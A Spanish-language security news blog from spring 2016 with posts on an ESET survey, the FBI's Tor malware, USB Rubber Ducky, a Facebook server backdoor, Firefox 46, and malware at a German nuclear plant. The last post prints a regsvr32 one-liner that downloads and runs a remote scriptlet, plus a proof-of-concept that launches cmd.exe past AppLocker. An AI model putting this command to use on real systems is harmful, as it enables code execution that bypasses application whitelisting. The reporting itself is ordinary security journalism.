1 may. 2016

¿Cómo gestionan la seguridad las empresas de Latinoamérica? [ESET]

Como cada año, el equipo de investigadores de ESET Latinoamérica acaba de lanzar una nueva edición del ESET Security Report [PDF], un informe que analiza el estado de la seguridad en las compañías de la región.

En él se consideran los incidentes que más las han afectado en el último año y las preocupaciones de los encargados de tomar decisiones, así como las medidas de seguridad que se aplican, la designación de responsabilidades y el presupuesto que se les asigna.

Los resultados surgen de más de 3.000 encuestas que ESET realizó a profesionales de seguridad en diversos eventos corporativos en la región. Los países en los que se trabajó fueron Argentina, Chile, Colombia, Costa Rica, Ecuador, El Salvador, Guatemala, Honduras, México, Nicaragua, Paraguay, Perú y Venezuela.

¿Cuáles son las preocupaciones de los encargados de la seguridad en empresas de Latinoamérica?

Los encuestados nombraron:
  • Vulnerabilidades de software y sistemas (58%)
  • Malware (54%)
  • Acceso indebido a la información (46%)
  • Fraude (37%)
  • Ataques DoS (33%)
  • Phishing (32%)
  • Técnicas de Ingeniería Social (28%)
Este conjunto de preocupaciones se condice con los incidentes que efectivamente sufrieron las organizaciones, ya que ante esta pregunta nombraron los mismos ítems. Es interesante destacar que el promedio de las empresas que afirmaron haber padecido un incidente se incrementó respecto a los años anteriores, pasando de 75% en 2013 a 78% en 2015.

Pero, ¿con qué herramientas y controles combaten estos riesgos? ¿Fueron víctimas de algún incidente de seguridad o de las grandes vulnerabilidades descubiertas el año pasado? Estas y otras preguntas son respondidas en el siguiente video, que adelanta los principales hallazgos del ESET Security Report 2016:

Entonces, ¿cuál es el panorama?

Los investigadores de ESET observan una lenta pero sostenida mejora en el nivel de madurez de la seguridad de la información corporativa en Latinoamérica, que certifica que muchos de los esfuerzos por promover la materia están siendo eficientes.

Por ejemplo, el presupuesto asignado para las áreas de seguridad incrementó para el 82% de los encuestados, y casi el 50% de las organizaciones lleva a cabo iniciativas de educación y concientización para su personal.

Y aunque estas acciones son buenos augurios, todavía hay un camino importante por recorrer. Los expertos en seguridad de ESET seguirán a acompañando a usuarios y empresas en cada paso.

Fuente: We Live Security

30 abr. 2016

Cylance, un nuevo jugador en la detección de ransomware en tiempo real

Combinando Inteligencia Artificial y Aprendizaje de Máquina, la solución Cylance Protect neutralizó ransomware diseñado para encriptar el disco duro con el fin de cobrar un rescate por la recuperación de los datos. Simultáneamente, Trend Micro permitió la instalación y ejecución del mismo ransomware, sin siquiera detectarlo. "Hemos desarmado el ADN del malware", asegura la empresa.
La prueba fue realizada en tiempo real, en el mismo sistema, con idénticas máquinas virtuales (VM), utilizando los mismos archivos descargados minutos antes desde Internet. En rigor, la comparación pudo haber sido realizada con cualquier otro proveedor que, al igual que Trend Micro, se basa en las firmas de malware. La implicación es -como explicó Cylance durante el evento realizado en Londres el 28 de abril- "estamos presenciando el ocaso de las firmas".

La demostración, a la que asistió Diario TI, estuvo a cargo de Lloyd Webb, Sales Engineering Director en Cylance. El experto habilitó dos máquinas virtuales idénticas, presentadas en pantalla a los asistentes, en las que copió ejecutables de ransomware subidos minutos antes a Internet por ciberdelincuentes. Una de las VM estaba protegida por Trend Micro, y la segunda por Cylance.

El resultado fue inmediato al hacer doble clic en los archivos ejecutables: en la VM dotada del antivirus de Trend Micro apareció una dramática ventana ilustrada por una calavera y texto rojo intermitente, donde se advertía al usuario que sus archivos habían sido encriptados por un sistema de cifrado de rango militar, y que su recuperación implicaba el pago de "US$ 100 o EUR 100", mediante una transacción en Bitcoin – criptodivisa no trazable. La VM protegida por Cylance, en tanto, presentó una ventana generada por el sistema operativo Windows, donde se indicaba que el archivo no podía ser ejecutado. Una ventana secundaria, esta vez de Cylance, notificaba en la barra de tareas que el ransomware había sido puesto en cuarentena.

Webb repitió el procedimiento dos veces más, obteniendo exactamente el mismo resultado. Si la primera extorsión, donde al ciberdelincuente le daba igual recibir US$100 o EUR100, ya había motivado sonrisas entre los asistentes, la segunda ventana hizo difícil contener la risa; la extorsión era firmada por el "Departamento de Protección Antimalware del Ministerio de Seguridad de la Información" sin indicarse, como era de esperar, el país de este supuesto ministerio.

En noviembre de 2015, Cylance firmó un acuerdo con Dell para la seguridad avanzada de endpoints. Actualmente, Dell es el único fabricante de PC en ofrecer una suite de seguridad integral que incorpora las tecnologías de inteligencia artificial de Cylance.

Fuente: DiarioTI

29 abr. 2016

Espionaje, TOR, privacidad o pornografía infantil ¿qué prefieres?

De una investigación del Daily Dot resulta que Matt Edman, un experto de seguridad y ex-empleado parcial del Proyecto TOR, ayudó al FBI a desarrollar el malware Cornhusker (aka Torsploit).

Se "supone" que la red TOR es anónima y que todo el tráfico que se genera dentro de la red está cifrado y la IP de origen queda enmascarada por la del nodo de entrada, sin embargo, es posible saltarse el enrutamiento del tráfico para desvelar la dirección IP real, por ejemplo, utilizando malware.

Cornhusker explota vulnerabilidades en Adobe Flash Player para revelar la IP actual de usuarios de la red TOR. El malware fuerza al complemento Flash Player a establecer una serie de conexiones directas es decir, sin enmascarar dentro de la red y permitía a los agentes federales hackear y desenmascarar a los usuarios de TOR en varios casos de alto perfil, incluyendo operación Torpedo y la investigación de Silk Road.

Torpedo fue una operación que buscaba identificar a los propietarios de una red de pornografía infantil que utilizan TOR y que ahora puede ser totalmente descartada por los métodos utilizados. A través de esta fue posible identificar a 25 personas relacionadas con la distribución de pornografía infantil.
Matt Edman es un experto en seguridad que se unió a Tor Project en 2008 para mejorar la interacción de TOR con Vidalia, la GUI multiplataforma de TOR. Después de 2009, Edman fue contratado por una empresa que trabaja para las agencias de inteligencia y defensa, incluyendo el FBI, para desarrollar un malware "anti-Tor".

TOR Project ha confirmado la noticia pero el equipo también dijo que Edman trabajó solamente en el proyecto de Vidalia, el cual fue lo reemplazado en 2013 por otras herramientas que buscan mejorar la experiencia del usuario.

Desde 2012, Edman ha estado trabajando en Mitre Corporation como Ingeniero de seguridad, asignado al equipo interno del FBI, bautizada como Remote Operations Unit, que desarrolla o compra exploits y herramientas para espiar objetivos potenciales.

Aunque, según documentos judiciales, Cornhusker ya no está en uso, el FBI está utilizando sus propios fondos de la "Network Investigative Technique" (NIT) para obtener las IPs y direcciones MAC de los usuarios de TOR, en el curso de las investigaciones judiciales.

Sin embargo, esta técnica de investigación ha sido considerada como no válido por el Tribunal durante una audiencia contra el sitio de pornografía infantil más grande del mundo, llamado PlayPen. El lunes, sus abogados han presentado una moción contra el FBI para revelar el código fuente completo del malware utilizado para hackear presuntos visitantes de PlayPen.

¿Con qué quedarse? Con la invasión a la privacidad por parte de fuerzas del "orden", con una investigación fallida por utilizar métodos no éticos o con sitios de pornografía infantil. El tiempo lo dirá, pero la discusión debe darse hoy.

Fuente: The Hackers News

Rubber Ducky: me parece que ví un lindo patito

USB Rubber Ducky es una herramienta hardware de hacking, internamente tiene un procesador, aunque a simple vista parece un USB, aunque emula ser un teclado, de tal forma que cuando se conecta a un ordenador/dispositivo éste lo reconoce como un teclado y ejecuta las instrucciones que tenga cargadas en una memoria SD que lleva.

USB Rubber Ducky se puede comprar a través de Hak5 y el contenido es el mostrado en la  Ilustración 1.
De izquierda a derecho tenemos las siguientes partes:
  • Adaptador de USB micro-B
  • Adaptador o lector de tarjetas microSD
  • USB Rubber Ducky
  • Tarjeta micro-SD
  • Carcasa de USB
USB Rubber Ducky es un dispositivo HID (Human Interface Device) o dispositivo de interfaz humana, es decir dispositivos de entrada y salida que permite la interacción con un ordenador, y en concreto, USB Rubber Ducky es detectado como un teclado en cualquier sistema operativo donde lo conectemos (Windows, Linux, OSX y Android).

USB Rubber Ducky utiliza un código de programación sencillo y mediante un editor de texto se pueden crear los payloads. A modo de ejemplo, tenemos las siguientes instrucciones:
  • WINDOWS r: Abrir la ventana de Ejecutar de Windows
  • STRING cadena de texto: mediante la instrucción STRING se da la orden de lo que se quiere escribir, en este caso escribiría "cadena de texto" (sin comillas).
  • ENTER: emula la tecla Intro.
En el caso de dispositivos Android, debemos tener en cuenta que estos sistemas soportan conectar dispositivos HID, por lo tanto, podemos conectar teclados externos y manejar y controlar el dispositivo mediante el teclado.

Continuar leyendo en fuente original Security Art Work y II

28 abr. 2016

Descubren un backdoor en uno de los servidores de Facebook

El sueño de cualquier investigador de seguridad es encontrar una vulnerabilidad en Facebook y reportarla a la compañía para entrar en su programa de recompensas. Sin embargo, el sueño de cualquier ciberdelincuente es aprovechar esta vulnerabilidad para propósitos ilegales, algo que podría hacer que ganase más dinero que el programa de recompensas de Facebook.

Recientemente, un investigador de seguridad llamado Orange Tsai de la compañía de seguridad taiwanesa DEVCORE, estaba estudiando a fondo diferentes servidores de Facebook con el objetivo de encontrar vulnerabilidades de seguridad o fallos para ganar dinero gracias al programa de recompensas de la compañía. Accidentalmente se topó con un backdoor en uno de los servidores corporativos de Facebook.
Este investigador estaba escaneando todo el espacio de direcciones de Facebook, hasta que dio con un dominio que estaba utilizando una versión vulnerable de una aplicación, esta aplicación se encarga de la transferencia segura de archivos y es usada por los empleados de Facebook para compartir archivos y también para colaborar en nuevos desarrollos.

Tsai analizó esta aplicación vulnerable y descubrió 7 fallos de seguridad (3 fallos de seguridad de tipo Cross-site Scripting, 2 fallos de seguridad de ejecución de código remoto y otros 2 fallos de escalada local de privilegios de usuario). Entonces este investigador aprovechó dichas vulnerabilidades para acceder al servidor de Facebook y empezar a analizar la información que allí había para posteriormente realizar un documento con toda la información recogida y comunicárselo a la compañía para que solucionaran dicho fallo.

Tsai se encontró que había instalado un backdoor que había sido puesto por un ciberdelincuente para obtener información de los credenciales de los trabajadores de Facebook. Tsai reportó estas vulnerabilidades y también que se encontró un backdoor en su interior, Facebook revisó su investigación y le recompensó con 10.000 dólares por su gran trabajo.

Un detalle muy importante de este problema que encontró Tsai, es que el backdoor estaba en un servidor corporativo de la compañía, y los credenciales de los millones de usuarios están almacenados en un servidor central, que no está conectado a este servidor que han comprometido.

Fuente: Redes Zone

DARPA quiere desarrollar un nuevo mensajero descentralizado y seguro

La Agencia de Proyectos de Investigación Avanzados de Defensa o más conocida como DARPA, ha lanzado un nuevo proyecto "Improv" dirigido a las empresas privadas del sector, con el objetivo de desarrollar una aplicación de mensajería y plataforma de transacción de datos ultra segura y que sea a prueba de cualquier hacker.

El DARPA está buscando a investigadores de seguridad para crear la aplicación de mensajería instantánea definitiva, que proporcione la más alta seguridad en las comunicaciones para proteger la información confidencial que fluya a través de ella. Además esta aplicación debería ser accesible tanto a través de los dispositivos móviles como a través del propio navegador de Internet.

Esta aplicación que desea tener el DARPA debe tener algunos requisitos de seguridad, como por ejemplo que la creación de los mensajes, el transporte de la información y la recepción de los mensajes sean totalmente descentralizados, de tal forma que no haya un servidor central por el que fluya toda la información que pueda ser atacado. De esta forma, cualquiera en cualquier sitio podrá enviar mensajes de forma segura a través de múltiples rutas, totalmente descentralizado.
El DARPA no quiere una aplicación de mensajería que implementen las típicas medidas de seguridad y cifrado que ya usan otras aplicaciones como Signal, WhatsApp o Telegram, sino que use protocolos descentralizados como Blockchain para evitar los ataques y la vigilancia de los usuarios que la usen.

Esta aplicación ultra segura de mensajería sería desarrollada en tres fases:
  • Crear un modelo de descentralización como Blockchain y proporcionar protocolos de cifrado.
  • Desarrollar y probar su funcionamiento a fondo.
  • Comercializar e implementar a gran escala la plataforma.
El DARPA ha proporcionado 150.000 dólares por año a los candidatos que pasen la primera fase, los candidatos para la fase 2 podrán ganar hasta 1 millón de dólares durante dos años. Durante la última fase, los candidatos podrán comercializar e implementar su solución globalmente, pero sin recibir fondos de EEUU. Este proyecto empezará el próximo día 23 de Mayo de 2016 y terminará el 22 de Junio de 2016.

Fuente: The Hacker News

Publicado Firefox 46, corrige 14 vulnerabilidades

Mozilla ha liberado una nueva versión de su navegador web, Firefox 46.0, que llega con las principales novedades y mejoras que vamos a ver a continuación. También se ha publicado Firefox ESR 45.1 (versión de soporte extendido).

Se han publicado 10 boletines de seguridad del año (del MSFA-2016-039 al MSFA-2016-048) destinados a solucionar 14
vulnerabilidades. Solo uno de ellos está considerado crítico, cuatro son de gravedad alta y los cinco restantes de nivel moderado. En total se corrigen 14 nuevas vulnerabilidades en Firefox.

Tres de los boletines publicados también afectan a Firefox ESR 45.1 especialmente destinada a grupos que despliegan y mantienen un entorno de escritorio en grandes organizaciones como universidades, escuelas, gobiernos o empresas.

Muchos de los cambios que incluye esta nueva versión están ocultos para los usuarios ya que son internos del propio navegador. Por ejemplo, pensando en la importancia de la reproducción de audio y vídeo en streaming a través de Internet (por ejemplo, con Netflix), esta nueva versión incluye los codecs necesarios para descodificar vídeo H.264 y audio AAC. Esto está solo disponible para los usuarios de Windows y Mac OS X.

Otra de las novedades, de la que ya hablamos en el pasado, es la aplicación de la nueva medida de seguridad W^X. Esta nueva medida permite al compilador JIT (Just in Time) configurar las páginas de memoria como de lectura o ejecución, pero nunca como ambas, evitando así la corrupción de memoria.

Otros cambios menores incluidos en esta nueva versión son la posibilidad de bloquear por defecto los dominios .onion, mejoras en la estabilidad y el rendimiento del protocolo RTC y la integración con GTK3 (solo para Linux).

También se han solucionado varias vulnerabilidades, aunque, por motivos de seguridad, estas aún no han sido desveladas.

Una de las novedades más esperadas por los usuarios de este navegador es Electrolysis, nombre en clave que Mozilla ha dado a su sistema multiproceso. Los usuarios de las ramas Nightly, Developer Edition y Beta sí que pueden probar esta función que mejora notablemente el rendimiento del sistema permitiendo separar todo el navegador en dos o más procesos, sin embargo, esta función es muy complicada de implementar, por lo que aún tiene algunos fallos y no puede ser considerada como “estable” para incluirse en el navegador.

Por el momento habrá que esperar, como mínimo, a la versión 47 para ver si, finalmente, la desarrolladora lleva su Electrolysis a todos los usuarios del navegador, marcando un antes y un después en el mismo.

Otras características que se esperaban para esta versión y no han sido incluidas son:
  • Async Pan Zoom (APZ), que mejorará el desplazamiento en las páginas web renderizadas por Firefox.
  • La firma obligatoria de extensiones que, aunque está configurada como “forzar”, aún no es una opción obligatoria ya que puede ser desactivada. Si todo sigue su cauce, en la próxima versión 47 ya solo se podrán instalar extensiones correctamente firmadas.
Además de la actualización de la rama estable a la versión 46, el resto de ramas también han sido actualizadas con el fin de seguir con su desarrollo. Por ello, la rama Beta se actualiza a la versión 47, la Developer Edition a la 48 y la Nightly a la 49. Las versiones de soporte extendido también se actualizan a las subversiones 38.8 y 45.1 añadiendo parches y correcciones.

Fuente: Redes Zone

27 abr. 2016

Planta nuclear de Alemania infectada y hackeada

La eléctrica RWE ha reconocido que la planta nuclear de Gundremmingen, localizada sólo a 120 km de Munich, con 1,3 Gigavatios de potencia y la más potente de todo el sistema energético alemán, ha sido hackeada.

La propia empresa ha sido la encargada de confirmar que en sus sistemas, supuestamente impenetrables, se han detectado varios virus informáticos y diferentes sistemas instalados sin conocimiento de la empresa que abrían la puerta a ataques informáticos.

Una exhaustiva revisión de seguridad de esta instalación, situada a 120 km al noroeste de la poblada ciudad de Múnich y en servicio desde hace 40 años, ha localizado los virus W32.Ramnit y Conficker en un sistema utilizado para visualizar datos relativos al movimiento de las barras de combustible, una de las maniobras más peligrosas en la operación de cualquier central nuclear.

También se encontraron diferentes ejemplares de malware en 18 unidades externas, la mayor parte de ellas memorias USB, aunque en este caso en equipos teóricamente aislados de la actividad operativa.

W32.Ramnit es un programa diseñado para robar ficheros de ordenadores que ejecuten los sistemas operativos de Microsoft, como señala Symantec. Fue descubierto en 2010 y una de sus vías de contagio son las unidades USB, aunque también puede entrar a través de internet. Una vez en el sistema, el programa permite al atacante controlar de forma remota el PC.

Por su parte, Conficker fue descubierto en 2008 y se distribuye mediante redes pero también copíandose a sí mismo en unidades de disco extraíbles, no sólo USB.

La revelación, que ha desatado una investigación por parte de la oficina federal de seguridad informática (BSI) y de la que está al corriente el consejo de seguridad nuclear, se produce justo cuando Alemania presiona a otros países vecinos para que incrementen la seguridad en sus reactores y cierren los más antiguos.

No se trata del primer ataque informático a una infraestructura crítica, y de hecho Irán tuvo que retrasar su programa nuclear varios años después de una infección que se atribuye al servicio secreto de Israel. La pasada semana la compañía española S2 Grupo, especializada en ciberseguridad, revelaba que el 47% de las vulnerabilidades en Infraestructuras Críticas pueden ser utilizadas por hackers con un bajo conocimiento especializado.

En su IV Informe sobre la protección de infraestructuras críticas la firma revelaba además que sólo un 20% de los posibles ataques a infraestructuras críticas requiere un nivel de conocimiento especializado alto.

Fuente: El Economista

Actualización de Wordpress, Drupal y phpBB

La versión 4.5 de WordPress, llamada #Coleman" en honor al saxofonista Coleman Hawkins, está disponible para su descarga o actualización desde el panel de administrador de WordPress.

Esta nueva versión incorpora bastantes novedades, entre ellas un nuevo atajos de formato (atajos de teclado para líneas horizontales y código), posibilidad de poner logos de negocio o marca en los temas twenty fifteen y sixteen (sección identidad del personalizador del sitio), vistas previas adaptables en vivo para todos los dispositivos, actualizaciones de las bibliotecas javascript, etc...

Se puede ver una lista completa de novedades en la correspondiente página del codex.

El equipo de Drupal acaba de publicar una actualización para la rama 8.1 cargada de novedades y sin actualizaciones de seguridad.

Incluye entre otras cosas mejoras en el CKEditor WYSIWYG, API’s, una página de ayuda mejorada y dos nuevos módulos experimentales que aún no son totalmente compatibles.

Se ha liberado una nueva actualización para la actualización 3.1.9 de phpBB, esta es una versión de mantenimiento que únicamente corrige algunos pequeños bugs de las versiones anteriores.

A pesar de todo se recomienda actualizar a la mayor brevedad posible.

Fuente: Daboweb

Saltear Windows AppLocker con un twit

Recientemente un investigador de seguridad llamado Casey Smith ha encontrado (@subtee) una forma bastante simple que puede evadir las restricciones de AppLocker mendiante el fetcher HTTP.
Véase el siguiente comando para Windows 10 Enterprise que cabe en un tweet:
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
Regsvr32 es parte del sistema operativo y se puede utilizar para registrar y des-registrar Scripts COM con el registro de Windows.
  • /s le dice a regsvr32 que se ejecute en silencio;
  • mediante /n no usaremos DllRegisterServer;
  • /i pasa un parámetro opcional (nuestra URL) para DllInstall;
  • /u significa que estamos tratando de anular el registro de un objeto y;
  • scrobj.dll es el Script Component Runtime de Microsoft.
Si se le pasa a Regsvr32 una dirección URL a analizar, lo que hace realmente es descargarlo a través de HTTP o HTTPS, incluso a través de proxy, y procesarla. Insertando código JavaScript en un XML y provocando su ejecución mediante la solicitud de anulación del registro de una DLL es posible ejecutar cmd.exe:
[scriptlet]
[registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}" nbsp="" progid="Empire"]
    [!-- Proof Of Concept - Casey Smith @subTee --]
    [script language="JScript"]
        [![CDATA[
    
            [span style="background-color: #ffe599;"]var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");[/span]    
    
        ]]]
[/script]
[/registration]
[/scriptlet]
El Javascript embebido utiliza ActiveX para abrir una consola de comandos. Si cambiamos cmd.exe por cualquier otro programa que no esté en la lista blanca de AppLocker... ¡se ejecutará!
<

El truco (Smith no ha querido llamarlo exploit) es limpio, ya que no toca el registro, no necesita derechos de administrador, puede ser "envuelto" en una sesión HTTP cifrada y no deja ningún rastro en el disco ya que lo descarga a memoria.

Por el momento, no existe un parche para esto y Smith ha creado una colección de Proof-of-Concept para ejecutar distintos tipos de scripts (y shells) en el equipo víctima.

Fuente: The Register | HackPlayers